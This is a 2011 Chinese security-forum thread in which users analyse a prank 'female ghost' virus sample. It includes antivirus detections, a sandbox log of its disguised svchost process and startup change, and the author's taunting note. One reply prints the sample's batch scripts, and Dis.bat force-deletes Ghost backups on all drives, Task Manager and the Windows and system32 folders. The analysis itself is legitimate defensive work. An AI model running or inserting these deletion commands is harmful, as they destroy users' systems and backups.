请HIPS党和高手帮忙看看这个是不是女鬼病毒？

显示全部楼层 · 发表于 2011-6-6 13:58:31

给115传送门！谢谢了！看看这个是不是女鬼病毒？

http://u.115.com/file/dna7egp7

显示全部楼层 · 发表于 2011-6-6 14:06:19

AVAST拦截发现病毒

显示全部楼层 · 发表于 2011-6-6 14:06:53

金山查杀

显示全部楼层 · 发表于 2011-6-6 14:22:12

to eset
http://www.virustotal.com/file-s ... a7fac955-1307341044

显示全部楼层 · 发表于 2011-6-6 14:28:34

本帖最后由 hj5abc 于 2011-6-6 14:29 编辑

to MSE

伪装svchost.exe进程

显示全部楼层 · 发表于 2011-6-6 14:29:43

单纯恶作剧吓人，还有用脚本删除系统文件

显示全部楼层 · 发表于 2011-6-6 14:30:25

本帖最后由 liulangzhecgr 于 2011-6-6 14:36 编辑

当我看到女鬼病毒的时候顿时感觉到了有趣
的确有点变态,半夜三更遇到这玩意儿也算倒霉的了
不过.......哥突发奇想也写个猛鬼病毒,顺便附带对系统的破坏 (^_^)
纯属技术交流,别把哥想象的那么龌龊哦~~~
My QQnumber: 603953541 & 329209148
病毒定义:Joke.WIN32.PhantomKill \(^0^)/

-------------------------------------------------------------------------------------------------

显示全部楼层 · 发表于 2011-6-6 14:55:22

本帖最后由 dm34343667 于 2011-6-6 14:57 编辑

显示全部楼层 · 发表于 2011-6-6 15:48:22

本帖最后由 a256886572008 于 2011-6-6 16:19 编辑

楼主，我已经提出正常的女鬼，拿去用吧

CAV杀

2011-06-06 14:16:27 C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe TrojWare.Win32.Agent.pkd@105548638

2011-06-06 15:20:11 C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE TrojWare.Win32.Agent.pkd@105548638

2011-06-06 15:21:43 D:\Phantom.exe TrojWare.Win32.Agent.pkd@105548638

------------------------------------------------------------

2011-06-06 15:20:02 C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe Sandboxed As Partially Limited

2011-06-06 15:20:04 C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE Sandboxed As Partially Limited

2011-06-06 15:20:11 C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe Modify File C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE

2011-06-06 15:20:12 C:\Documents and Settings\Roger\Application Data\Phantom\path.bat Sandboxed As Partially Limited

2011-06-06 15:20:13 C:\WINDOWS\system32\conime.exe Sandboxed As Partially Limited

2011-06-06 15:20:19 C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe Modify Key HKUS\S-1-5-21-1214440339-1682526488-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup

2011-06-06 15:20:26 C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe Modify File C:\Documents and Settings\Roger\「開始」功能表\程式集\啟動\Corporation.lnk

2011-06-06 15:21:13 C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE Modify File D:\Phantom.exe

调用批处理作坏事

C:\Documents and Settings\Roger\Application Data\Phantom\path.bat

@echo off
@set alldrive=Z Y X W V U T S R Q P O N M L K J I H G F E D C
@md D:\sd\
@for %%a in (%alldrive%) do (
echo . >> %%a:\sd.dr
if exist %%a:\sd.dr echo . >> D:\sd\%%a
if exist %%a:\sd.dr goto nodis
)
:nodis
@exit

复制代码

C:\Documents and Settings\Roger\Application Data\Phantom\Dis.bat

@echo off
@set alldrive=C D E F G H I J K L M N O P Q R S T U V W X Y Z
@for %%a in (%alldrive%) do (del /f /s /q %%a:\*.gho)
@del /f /s /q %SystemRoot%\system32\taskmgr.exe
@del /f /s /q %SystemRoot%\system32\*.*
@del /f /s /q %SystemRoot%\*.*
@exit

复制代码

病毒作者的声明
D:\∴Phantom∴.txt

当我看到女鬼病毒的时候顿时感觉到了有趣
的确有点变态,半夜三更遇到这玩意儿也算倒霉的了
不过.......哥突发奇想也写个猛鬼病毒,顺便附带对系统的破坏 (^_^)
纯属技术交流,别把哥想象的那么龌龊哦~~~
My QQnumber: 603953541 & 329209148
病毒定义:Joke.WIN32.PhantomKill \(^0^)/

显示全部楼层 · 发表于 2011-6-6 15:57:25

本帖最后由怡宝于 2011-6-6 15:58 编辑

a256886572008 发表于 2011-6-6 15:48
楼主，我已经提出正常的女鬼，拿去用吧

感谢！不过顺便问下，这个女鬼病毒，是会在关机状态下自动开机并且启动的么？它修改哪个注册表做到的？我记得要自动开机好像得设置BIOS的哇？这毒能在windows7下运行么？下载的你给的这个正常女鬼，360网盾报安全。。额，刚打开你提取出来的看了，是图片和声音文件，呵呵，是说咋个报安全

[病毒样本] 请HIPS党和高手帮忙看看这个是不是女鬼病毒？

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块